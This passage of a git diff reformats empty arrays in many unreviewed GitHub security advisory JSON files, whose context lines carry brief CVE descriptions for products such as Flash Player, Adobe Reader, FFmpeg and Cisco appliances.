+13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mfv8-4573-p833/GHSA-mfv8-4573-p833.json b/advisories/unreviewed/2022/05/GHSA-mfv8-4573-p833/GHSA-mfv8-4573-p833.json index 2e7d7bfdb78..6ea451a9dcb 100644 --- a/advisories/unreviewed/2022/05/GHSA-mfv8-4573-p833/GHSA-mfv8-4573-p833.json +++ b/advisories/unreviewed/2022/05/GHSA-mfv8-4573-p833/GHSA-mfv8-4573-p833.json @@ -7,12 +7,8 @@ "CVE-2008-4818" ], "details": "Cross-site scripting (XSS) vulnerability in Adobe Flash Player 9.0.124.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving HTTP response headers.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mfw6-8hcm-9f78/GHSA-mfw6-8hcm-9f78.json b/advisories/unreviewed/2022/05/GHSA-mfw6-8hcm-9f78/GHSA-mfw6-8hcm-9f78.json index bc2dbfd72bf..6e4abc5ee81 100644 --- a/advisories/unreviewed/2022/05/GHSA-mfw6-8hcm-9f78/GHSA-mfw6-8hcm-9f78.json +++ b/advisories/unreviewed/2022/05/GHSA-mfw6-8hcm-9f78/GHSA-mfw6-8hcm-9f78.json @@ -7,12 +7,8 @@ "CVE-2011-2414" ], "details": "Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2137, and CVE-2011-2415.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mg9g-wrgp-cf52/GHSA-mg9g-wrgp-cf52.json b/advisories/unreviewed/2022/05/GHSA-mg9g-wrgp-cf52/GHSA-mg9g-wrgp-cf52.json index 0dc1729f3d8..ec03134de20 100644 --- a/advisories/unreviewed/2022/05/GHSA-mg9g-wrgp-cf52/GHSA-mg9g-wrgp-cf52.json +++ b/advisories/unreviewed/2022/05/GHSA-mg9g-wrgp-cf52/GHSA-mg9g-wrgp-cf52.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mggw-wg5r-rgfm/GHSA-mggw-wg5r-rgfm.json b/advisories/unreviewed/2022/05/GHSA-mggw-wg5r-rgfm/GHSA-mggw-wg5r-rgfm.json index e8c22c68e95..e1195a48c8a 100644 --- a/advisories/unreviewed/2022/05/GHSA-mggw-wg5r-rgfm/GHSA-mggw-wg5r-rgfm.json +++ b/advisories/unreviewed/2022/05/GHSA-mggw-wg5r-rgfm/GHSA-mggw-wg5r-rgfm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mgvg-34gh-hq83/GHSA-mgvg-34gh-hq83.json b/advisories/unreviewed/2022/05/GHSA-mgvg-34gh-hq83/GHSA-mgvg-34gh-hq83.json index e6d5c1f0d11..a8a4f21b150 100644 --- a/advisories/unreviewed/2022/05/GHSA-mgvg-34gh-hq83/GHSA-mgvg-34gh-hq83.json +++ b/advisories/unreviewed/2022/05/GHSA-mgvg-34gh-hq83/GHSA-mgvg-34gh-hq83.json @@ -7,12 +7,8 @@ "CVE-2012-2784" ], "details": "Unspecified vulnerability in the decode_pic function in libavcodec/cavsdec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to \"width/height changing in CAVS,\" a different vulnerability than CVE-2012-2777.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mgwg-q24j-25fg/GHSA-mgwg-q24j-25fg.json b/advisories/unreviewed/2022/05/GHSA-mgwg-q24j-25fg/GHSA-mgwg-q24j-25fg.json index e4607e845c3..bb2f4ade7bb 100644 --- a/advisories/unreviewed/2022/05/GHSA-mgwg-q24j-25fg/GHSA-mgwg-q24j-25fg.json +++ b/advisories/unreviewed/2022/05/GHSA-mgwg-q24j-25fg/GHSA-mgwg-q24j-25fg.json @@ -7,12 +7,8 @@ "CVE-2010-1578" ], "details": "Unspecified vulnerability in the SunRPC inspection feature on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software 7.2 before 7.2(5), 8.0 before 8.0(5.19), 8.1 before 8.1(2.47), and 8.2 before 8.2(2) and Cisco PIX Security Appliances 500 series devices allows remote attackers to cause a denial of service (device reload) via crafted SunRPC UDP packets, aka Bug ID CSCtc77567.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mj96-8vrc-qg49/GHSA-mj96-8vrc-qg49.json b/advisories/unreviewed/2022/05/GHSA-mj96-8vrc-qg49/GHSA-mj96-8vrc-qg49.json index 1f75467af29..65c1b0d78d0 100644 --- a/advisories/unreviewed/2022/05/GHSA-mj96-8vrc-qg49/GHSA-mj96-8vrc-qg49.json +++ b/advisories/unreviewed/2022/05/GHSA-mj96-8vrc-qg49/GHSA-mj96-8vrc-qg49.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mjxw-6345-g8hc/GHSA-mjxw-6345-g8hc.json b/advisories/unreviewed/2022/05/GHSA-mjxw-6345-g8hc/GHSA-mjxw-6345-g8hc.json index bf05ed2d4c7..53c6ec64407 100644 --- a/advisories/unreviewed/2022/05/GHSA-mjxw-6345-g8hc/GHSA-mjxw-6345-g8hc.json +++ b/advisories/unreviewed/2022/05/GHSA-mjxw-6345-g8hc/GHSA-mjxw-6345-g8hc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mmv4-x29x-3r52/GHSA-mmv4-x29x-3r52.json b/advisories/unreviewed/2022/05/GHSA-mmv4-x29x-3r52/GHSA-mmv4-x29x-3r52.json index 064b77bef25..7b5facfc233 100644 --- a/advisories/unreviewed/2022/05/GHSA-mmv4-x29x-3r52/GHSA-mmv4-x29x-3r52.json +++ b/advisories/unreviewed/2022/05/GHSA-mmv4-x29x-3r52/GHSA-mmv4-x29x-3r52.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mq97-mr3q-63ph/GHSA-mq97-mr3q-63ph.json b/advisories/unreviewed/2022/05/GHSA-mq97-mr3q-63ph/GHSA-mq97-mr3q-63ph.json index f93dada1e75..abdec70c126 100644 --- a/advisories/unreviewed/2022/05/GHSA-mq97-mr3q-63ph/GHSA-mq97-mr3q-63ph.json +++ b/advisories/unreviewed/2022/05/GHSA-mq97-mr3q-63ph/GHSA-mq97-mr3q-63ph.json @@ -7,12 +7,8 @@ "CVE-2013-0999" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mqqx-c4gr-338h/GHSA-mqqx-c4gr-338h.json b/advisories/unreviewed/2022/05/GHSA-mqqx-c4gr-338h/GHSA-mqqx-c4gr-338h.json index 7fad6bbb09b..79823fe0a86 100644 --- a/advisories/unreviewed/2022/05/GHSA-mqqx-c4gr-338h/GHSA-mqqx-c4gr-338h.json +++ b/advisories/unreviewed/2022/05/GHSA-mqqx-c4gr-338h/GHSA-mqqx-c4gr-338h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mqwc-9q6f-pv6q/GHSA-mqwc-9q6f-pv6q.json b/advisories/unreviewed/2022/05/GHSA-mqwc-9q6f-pv6q/GHSA-mqwc-9q6f-pv6q.json index 800b6354777..85231d02152 100644 --- a/advisories/unreviewed/2022/05/GHSA-mqwc-9q6f-pv6q/GHSA-mqwc-9q6f-pv6q.json +++ b/advisories/unreviewed/2022/05/GHSA-mqwc-9q6f-pv6q/GHSA-mqwc-9q6f-pv6q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mr29-7grf-cqr2/GHSA-mr29-7grf-cqr2.json b/advisories/unreviewed/2022/05/GHSA-mr29-7grf-cqr2/GHSA-mr29-7grf-cqr2.json index b592c799f14..77f5b447fc3 100644 --- a/advisories/unreviewed/2022/05/GHSA-mr29-7grf-cqr2/GHSA-mr29-7grf-cqr2.json +++ b/advisories/unreviewed/2022/05/GHSA-mr29-7grf-cqr2/GHSA-mr29-7grf-cqr2.json @@ -7,12 +7,8 @@ "CVE-2011-0620" ], "details": "Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0619, CVE-2011-0621, and CVE-2011-0622.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mr8h-ff7v-3qqc/GHSA-mr8h-ff7v-3qqc.json b/advisories/unreviewed/2022/05/GHSA-mr8h-ff7v-3qqc/GHSA-mr8h-ff7v-3qqc.json index baa6a0f220a..84556dbb5a0 100644 --- a/advisories/unreviewed/2022/05/GHSA-mr8h-ff7v-3qqc/GHSA-mr8h-ff7v-3qqc.json +++ b/advisories/unreviewed/2022/05/GHSA-mr8h-ff7v-3qqc/GHSA-mr8h-ff7v-3qqc.json @@ -7,12 +7,8 @@ "CVE-2013-5596" ], "details": "The cycle collection (CC) implementation in Mozilla Firefox before 25.0, Firefox ESR 24.x before 24.1, Thunderbird before 24.1, and SeaMonkey before 2.22 does not properly determine the thread for release of an image object, which allows remote attackers to execute arbitrary code or cause a denial of service (race condition and application crash) via a large HTML document containing IMG elements, as demonstrated by the Never-Ending Reddit on reddit.com.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mvc7-hj3c-927m/GHSA-mvc7-hj3c-927m.json b/advisories/unreviewed/2022/05/GHSA-mvc7-hj3c-927m/GHSA-mvc7-hj3c-927m.json index ae943464ca5..f76420e282a 100644 --- a/advisories/unreviewed/2022/05/GHSA-mvc7-hj3c-927m/GHSA-mvc7-hj3c-927m.json +++ b/advisories/unreviewed/2022/05/GHSA-mvc7-hj3c-927m/GHSA-mvc7-hj3c-927m.json @@ -7,12 +7,8 @@ "CVE-2012-2777" ], "details": "Unspecified vulnerability in the decode_pic function in libavcodec/cavsdec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to \"width/height changing in CAVS,\" a different vulnerability than CVE-2012-2784.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mvq7-4h39-6963/GHSA-mvq7-4h39-6963.json b/advisories/unreviewed/2022/05/GHSA-mvq7-4h39-6963/GHSA-mvq7-4h39-6963.json index c94b82a68a5..841800cc2c9 100644 --- a/advisories/unreviewed/2022/05/GHSA-mvq7-4h39-6963/GHSA-mvq7-4h39-6963.json +++ b/advisories/unreviewed/2022/05/GHSA-mvq7-4h39-6963/GHSA-mvq7-4h39-6963.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mvqc-qf5q-pvwc/GHSA-mvqc-qf5q-pvwc.json b/advisories/unreviewed/2022/05/GHSA-mvqc-qf5q-pvwc/GHSA-mvqc-qf5q-pvwc.json index 5391a362852..ea196513bae 100644 --- a/advisories/unreviewed/2022/05/GHSA-mvqc-qf5q-pvwc/GHSA-mvqc-qf5q-pvwc.json +++ b/advisories/unreviewed/2022/05/GHSA-mvqc-qf5q-pvwc/GHSA-mvqc-qf5q-pvwc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mw8q-35r2-26hm/GHSA-mw8q-35r2-26hm.json b/advisories/unreviewed/2022/05/GHSA-mw8q-35r2-26hm/GHSA-mw8q-35r2-26hm.json index 8fd75b303bd..1f81b6588c2 100644 --- a/advisories/unreviewed/2022/05/GHSA-mw8q-35r2-26hm/GHSA-mw8q-35r2-26hm.json +++ b/advisories/unreviewed/2022/05/GHSA-mw8q-35r2-26hm/GHSA-mw8q-35r2-26hm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mx9h-cphx-6qgf/GHSA-mx9h-cphx-6qgf.json b/advisories/unreviewed/2022/05/GHSA-mx9h-cphx-6qgf/GHSA-mx9h-cphx-6qgf.json index e8dd6d31bce..89d55d6a6f9 100644 --- a/advisories/unreviewed/2022/05/GHSA-mx9h-cphx-6qgf/GHSA-mx9h-cphx-6qgf.json +++ b/advisories/unreviewed/2022/05/GHSA-mx9h-cphx-6qgf/GHSA-mx9h-cphx-6qgf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p2cc-7j2p-mw79/GHSA-p2cc-7j2p-mw79.json b/advisories/unreviewed/2022/05/GHSA-p2cc-7j2p-mw79/GHSA-p2cc-7j2p-mw79.json index d3bba4040fd..f6beedc05c2 100644 --- a/advisories/unreviewed/2022/05/GHSA-p2cc-7j2p-mw79/GHSA-p2cc-7j2p-mw79.json +++ b/advisories/unreviewed/2022/05/GHSA-p2cc-7j2p-mw79/GHSA-p2cc-7j2p-mw79.json @@ -7,12 +7,8 @@ "CVE-2013-0994" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-p2px-4wm4-xfwj/GHSA-p2px-4wm4-xfwj.json b/advisories/unreviewed/2022/05/GHSA-p2px-4wm4-xfwj/GHSA-p2px-4wm4-xfwj.json index 401923b92c3..09cb9fa0275 100644 --- a/advisories/unreviewed/2022/05/GHSA-p2px-4wm4-xfwj/GHSA-p2px-4wm4-xfwj.json +++ b/advisories/unreviewed/2022/05/GHSA-p2px-4wm4-xfwj/GHSA-p2px-4wm4-xfwj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p4w9-qqg4-c6m7/GHSA-p4w9-qqg4-c6m7.json b/advisories/unreviewed/2022/05/GHSA-p4w9-qqg4-c6m7/GHSA-p4w9-qqg4-c6m7.json index 1ae1b185734..92ae7c86d17 100644 --- a/advisories/unreviewed/2022/05/GHSA-p4w9-qqg4-c6m7/GHSA-p4w9-qqg4-c6m7.json +++ b/advisories/unreviewed/2022/05/GHSA-p4w9-qqg4-c6m7/GHSA-p4w9-qqg4-c6m7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p68h-mwpj-wv3w/GHSA-p68h-mwpj-wv3w.json b/advisories/unreviewed/2022/05/GHSA-p68h-mwpj-wv3w/GHSA-p68h-mwpj-wv3w.json index 6788778465c..4ba28759297 100644 --- a/advisories/unreviewed/2022/05/GHSA-p68h-mwpj-wv3w/GHSA-p68h-mwpj-wv3w.json +++ b/advisories/unreviewed/2022/05/GHSA-p68h-mwpj-wv3w/GHSA-p68h-mwpj-wv3w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p7jm-64r8-c5vp/GHSA-p7jm-64r8-c5vp.json b/advisories/unreviewed/2022/05/GHSA-p7jm-64r8-c5vp/GHSA-p7jm-64r8-c5vp.json index 4870e833f79..ee8e6ab6fa0 100644 --- a/advisories/unreviewed/2022/05/GHSA-p7jm-64r8-c5vp/GHSA-p7jm-64r8-c5vp.json +++ b/advisories/unreviewed/2022/05/GHSA-p7jm-64r8-c5vp/GHSA-p7jm-64r8-c5vp.json @@ -7,12 +7,8 @@ "CVE-2012-2486" ], "details": "The Cisco Discovery Protocol (CDP) implementation on Cisco TelePresence Multipoint Switch before 1.9.0, Cisco TelePresence Immersive Endpoint Devices before 1.9.1, Cisco TelePresence Manager before 1.9.0, and Cisco TelePresence Recording Server before 1.8.1 allows remote attackers to execute arbitrary code by leveraging certain adjacency and sending a malformed CDP packet, aka Bug IDs CSCtz40953, CSCtz40947, CSCtz40965, and CSCtz40953.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p98m-xpc7-793v/GHSA-p98m-xpc7-793v.json b/advisories/unreviewed/2022/05/GHSA-p98m-xpc7-793v/GHSA-p98m-xpc7-793v.json index eea5d60b787..2e3863d4706 100644 --- a/advisories/unreviewed/2022/05/GHSA-p98m-xpc7-793v/GHSA-p98m-xpc7-793v.json +++ b/advisories/unreviewed/2022/05/GHSA-p98m-xpc7-793v/GHSA-p98m-xpc7-793v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p98r-h5ph-97jj/GHSA-p98r-h5ph-97jj.json b/advisories/unreviewed/2022/05/GHSA-p98r-h5ph-97jj/GHSA-p98r-h5ph-97jj.json index 6e3ea1fc2bb..0f88029e038 100644 --- a/advisories/unreviewed/2022/05/GHSA-p98r-h5ph-97jj/GHSA-p98r-h5ph-97jj.json +++ b/advisories/unreviewed/2022/05/GHSA-p98r-h5ph-97jj/GHSA-p98r-h5ph-97jj.json @@ -7,12 +7,8 @@ "CVE-2010-3622" ], "details": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p99w-63fc-wh64/GHSA-p99w-63fc-wh64.json b/advisories/unreviewed/2022/05/GHSA-p99w-63fc-wh64/GHSA-p99w-63fc-wh64.json index ef053632ed4..271f63b3e72 100644 --- a/advisories/unreviewed/2022/05/GHSA-p99w-63fc-wh64/GHSA-p99w-63fc-wh64.json +++ b/advisories/unreviewed/2022/05/GHSA-p99w-63fc-wh64/GHSA-p99w-63fc-wh64.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pc48-33pf-32pp/GHSA-pc48-33pf-32pp.json b/advisories/unreviewed/2022/05/GHSA-pc48-33pf-32pp/GHSA-pc48-33pf-32pp.json index dc427fd011c..b1e211b185d 100644 --- a/advisories/unreviewed/2022/05/GHSA-pc48-33pf-32pp/GHSA-pc48-33pf-32pp.json +++ b/advisories/unreviewed/2022/05/GHSA-pc48-33pf-32pp/GHSA-pc48-33pf-32pp.json @@ -7,12 +7,8 @@ "CVE-2011-2426" ], "details": "Stack-based buffer overflow in the ActionScript Virtual Machine (AVM) component in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pcgp-3vvv-qw57/GHSA-pcgp-3vvv-qw57.json b/advisories/unreviewed/2022/05/GHSA-pcgp-3vvv-qw57/GHSA-pcgp-3vvv-qw57.json index 3ca18a10396..e79273f83a9 100644 --- a/advisories/unreviewed/2022/05/GHSA-pcgp-3vvv-qw57/GHSA-pcgp-3vvv-qw57.json +++ b/advisories/unreviewed/2022/05/GHSA-pcgp-3vvv-qw57/GHSA-pcgp-3vvv-qw57.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pcm6-2v3m-pp43/GHSA-pcm6-2v3m-pp43.json b/advisories/unreviewed/2022/05/GHSA-pcm6-2v3m-pp43/GHSA-pcm6-2v3m-pp43.json index 305516e9aa4..080cdd443db 100644 --- a/advisories/unreviewed/2022/05/GHSA-pcm6-2v3m-pp43/GHSA-pcm6-2v3m-pp43.json +++ b/advisories/unreviewed/2022/05/GHSA-pcm6-2v3m-pp43/GHSA-pcm6-2v3m-pp43.json @@ -7,12 +7,8 @@ "CVE-2011-2139" ], "details": "Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pcvf-vh7g-8j8v/GHSA-pcvf-vh7g-8j8v.json b/advisories/unreviewed/2022/05/GHSA-pcvf-vh7g-8j8v/GHSA-pcvf-vh7g-8j8v.json index 28f3e1d89ce..5bc95469a97 100644 --- a/advisories/unreviewed/2022/05/GHSA-pcvf-vh7g-8j8v/GHSA-pcvf-vh7g-8j8v.json +++ b/advisories/unreviewed/2022/05/GHSA-pcvf-vh7g-8j8v/GHSA-pcvf-vh7g-8j8v.json @@ -7,12 +7,8 @@ "CVE-2008-5112" ], "details": "The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pfp2-c9q6-64cg/GHSA-pfp2-c9q6-64cg.json b/advisories/unreviewed/2022/05/GHSA-pfp2-c9q6-64cg/GHSA-pfp2-c9q6-64cg.json index 106ad89f788..366f730176e 100644 --- a/advisories/unreviewed/2022/05/GHSA-pfp2-c9q6-64cg/GHSA-pfp2-c9q6-64cg.json +++ b/advisories/unreviewed/2022/05/GHSA-pfp2-c9q6-64cg/GHSA-pfp2-c9q6-64cg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pg5f-r6cj-gx6r/GHSA-pg5f-r6cj-gx6r.json b/advisories/unreviewed/2022/05/GHSA-pg5f-r6cj-gx6r/GHSA-pg5f-r6cj-gx6r.json index daaf599d36c..24425909940 100644 --- a/advisories/unreviewed/2022/05/GHSA-pg5f-r6cj-gx6r/GHSA-pg5f-r6cj-gx6r.json +++ b/advisories/unreviewed/2022/05/GHSA-pg5f-r6cj-gx6r/GHSA-pg5f-r6cj-gx6r.json @@ -7,12 +7,8 @@ "CVE-2013-1008" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-phmp-vmqj-g6v8/GHSA-phmp-vmqj-g6v8.json b/advisories/unreviewed/2022/05/GHSA-phmp-vmqj-g6v8/GHSA-phmp-vmqj-g6v8.json index 46e32b2fb40..b1af10b994a 100644 --- a/advisories/unreviewed/2022/05/GHSA-phmp-vmqj-g6v8/GHSA-phmp-vmqj-g6v8.json +++ b/advisories/unreviewed/2022/05/GHSA-phmp-vmqj-g6v8/GHSA-phmp-vmqj-g6v8.json @@ -7,12 +7,8 @@ "CVE-2011-0593" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0595, and CVE-2011-0600.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pj8h-q9j3-qpvv/GHSA-pj8h-q9j3-qpvv.json b/advisories/unreviewed/2022/05/GHSA-pj8h-q9j3-qpvv/GHSA-pj8h-q9j3-qpvv.json index 139914edaee..ef07a1d6070 100644 --- 